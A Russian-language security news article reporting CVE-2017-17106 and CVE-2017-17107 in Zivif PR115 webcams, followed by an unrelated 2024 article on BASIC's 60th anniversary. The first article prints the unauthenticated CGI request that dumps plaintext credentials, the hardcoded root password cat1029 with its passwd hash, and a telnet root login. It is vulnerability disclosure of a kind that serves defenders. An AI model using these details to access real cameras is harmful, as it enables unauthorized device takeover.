В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Олег Иванов 09 Января 2018 - 10:44

...

В веб-камерах Zivif обнаружен жестко закодированный рутовый пароль

Веб-камеры Zivif PR115-204-P-RS V2.3.4.2103 содержат жестко закодированный пароль cat1029, использующийся для пользователя root. Настройка операционной системы SONIX делает этот пароль неизменяемым, соответственно, его можно использовать для доступа к устройству через сеанс TELNET.

Как утверждают специалисты, камерам Zivif недостает контроля доступа, в результате функции CGI можно вызывать напрямую, обходя проверки подлинности.

Проблема получила идентификатор CVE-2017-17106, заключается она в том, что камера на запрос http://<Адрес Камеры>/web/cgi-bin/hi3510/param.cgi?cmd=getuser отвечает следующим образом:

var name0="admin"; var password0="admin"; var authLevel0="255"; var
name1="guest"; var password1="guest"; var authLevel1="3"; var
name2="admin2"; var password2="admin"; var authLevel2="3"; var name3="";
var password3=""; var authLevel3="3"; var name4=""; var password4="";
var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3";
var name6=""; var password6=""; var authLevel6="3"; var name7=""; var
password7=""; var authLevel7="3"; var name8=""; var password8=""; var
authLevel8="0"; var name9=""; var password9=""; var authLevel9="0

Учетные данные возвращаются в текстовом виде.

Также эксперты отметили в файле /etc/passwd наличие жестко закодированной записи (CVE-2017-17107):

root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh

Зашифрованный пароль - cat1029.

(none) login: root
Password:
Login incorrect
(none) login: root
Password:
Welcome to SONIX.
\u@\h:\W$

Из-за того, как структурирована файловая система, изменение этого пароля составит нетривиальную задачу.

Следующая главная новость »

Подписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Вероника Дубровская 02 Мая 2024 - 20:52

Общее

С днём рождения, BASIC! Языку программирования исполнилось 60 лет

Простой язык программирования, разработанный ещё в 1964 году, стал основой персональных компьютеров Apple, TRS-80, IBM и Commodore. На этой неделе ему исполнилось 60 лет.

1 мая 1964 года профессора Дартмутского колледжа Томас Курц и Джон Кемени успешно запустили первую программу, написанную на только что разработанном языке программирования BASIC (Beginner's All-Purpose Symbolic Instruction Code) на мэйнфрейме General Electric GE-225.

BASIC был создан как простейший язык для непосредственного общения человека с вычислительной машиной и впоследствии вдохновил целые поколения программистов.

Именно понятный синтаксис BASIC с его простыми английскими ключевыми словами стал залогом популярности среди начинающих программистов.

Мы все привыкли к маленьким, недорогим компьютерам, простым в использовании. Но так было не всегда. Изначально программирование заключалось в физическом соединении проводов и переключении рычагов. Спустя время инженеры смогли избежать низкоуровневые операции. В бой пошли языки программирования.

До появления BASIC уже существовали некоторые языки программирования, такие как Fortran, Algol и COBOL. Проблема заключалась в том, что они были сложными и использовались только профессионалами. BASIC создавался как инструмент, с помощью которого студенты-непрограммисты могли самостоятельно создавать компьютерные программы для решения своих задач. Простота и мощь этого языка программирования быстро сделали его любимым как среди обучающихся, так и среди преподавателей.

Кемени, Курц и группа студентов создали для General Electric операционную систему с разделением времени. BASIC, запущенный на этой операционной системе, позволил колледжам, средним школам и частным лицам по всей стране подключаться к мейнфреймам и писать программы. Влияние BASIC стало распространяться далеко за пределы кампуса Дартмута.

В 1970-е годы началось активное развитие персональных компьютеров, BASIC тоже не стоял на месте. Пол Аллен и Билл Гейтс адаптировали язык для ПК типа Altair 8800, основав в то время компанию Microsoft. В 1976 году Стив Возняк разработал интерпретатор BASIC с нуля для Apple I, который впоследствии стал ключевой частью Apple II.

BASIC пользуется популярностью среди любителей ретрокомпьютеров, но мало кто использует его в качестве практического языка.

Потомки BASIC, такие как Visual Basic, Visual Basic for Applications (VBA) и Microsoft Small Basic, продолжают жить. Представленный в 1991 году Visual Basic применяется для разработки Windows-приложений, а для создания сценариев и автоматизации в приложениях Microsoft Office служит VBA. Для обучения начинающих программистов используется Microsoft Small Basic.

За простоту и легкость в использовании теперь отвечают другие современные языки программирования, такие как Python и JavaScript. Они взяли на себя роль, которую когда-то выполнял BASIC.

BASIC послужил толчком в обеспечении доступности вычислительной техники для широкой аудитории.